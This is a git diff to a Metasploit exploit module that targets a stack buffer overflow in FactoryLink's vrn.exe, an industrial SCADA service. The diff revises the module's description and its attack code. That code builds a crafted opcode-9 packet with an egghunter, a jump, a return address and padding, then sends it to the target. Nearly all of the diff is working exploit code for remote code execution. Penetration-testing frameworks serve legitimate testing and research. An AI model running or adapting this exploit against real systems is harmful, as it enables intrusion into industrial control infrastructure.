diff --git a/modules/exploits/windows/scada/factorylink_vrn_09.rb b/modules/exploits/windows/scada/factorylink_vrn_09.rb index d620c45812..f859efc59d 100644 --- a/modules/exploits/windows/scada/factorylink_vrn_09.rb +++ b/modules/exploits/windows/scada/factorylink_vrn_09.rb @@ -21,9 +21,11 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'FactoryLink vrn.exe Opcode 9 Buffer Overflow', 'Description' => %q{ - This module exploits a stack buffer overflow in FactoryLink 7.5, 7.5 SP2, and 8.0.1.703. - By sending a specially crafted packet, an attacker may be able to execute arbitrary code. - Originally found and posted by Luigi Auriemma. + This module exploits a stack buffer overflow in FactoryLink 7.5, 7.5 SP2, + and 8.0.1.703. By sending a specially crafted packet, an attacker may be able to + execute arbitrary code due to the improper use of a vsprintf() function while + processing the user-supplied text field. Originally found and posted by + Luigi Auriemma. }, 'Author' => [ @@ -64,30 +66,31 @@ class Metasploit3 < Msf::Exploit::Remote def exploit connect + #The use of egghunter seems appropriate due to the small buffer in [ESP+8] hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true, :startreg => 'ebp'}) egg = hunter[1] - header = "\x3f\x3f\x3f\x3f" - header << "\xff\x55" - header << "\x09\x00" - header << "\x3f\x3f\xff\xff\x00\x00\x3f\x3f" - header << "\x01\x00\x3f\x3f\x3f\x3f\x3f\x3f" - header << "\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f" - header << "\x3f\x3f" - header << "\xff\xff\xff\xff" - header << "\x3f\x3f" + header = "\x3f\x3f\x3f\x3f" + header << "\xff\x55" + header << "\x09\x00" + header << "\x3f\x3f\xff\xff\x00\x00\x3f\x3f" + header << "\x01\x00\x3f\x3f\x3f\x3f\x3f\x3f" + header << "\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f" + header << "\x3f\x3f" + header << "\xff\xff\xff\xff" + header << "\x3f\x3f" - request = header - request << rand_text_alpha_upper(100) - request << egg - request << ("C" * target['padding']) - request << "\xeb\x06\x90\x90" - request << [target.ret].pack('V') - request << "C"*24 - request << hunter[0] - request << rand_text_alpha_upper(100000) + request = header + request << rand_text_alpha_upper(100) + request << egg + request << rand_text_alpha(target['padding']) + request << "\xeb\x06\x90\x90" + request << [target.ret].pack('V') + request << make_nops(24) + request << hunter[0] + request << rand_text_alpha_upper(100000) print_status("Trying target #{target.name} with #{request.size} bytes") sock.put(request)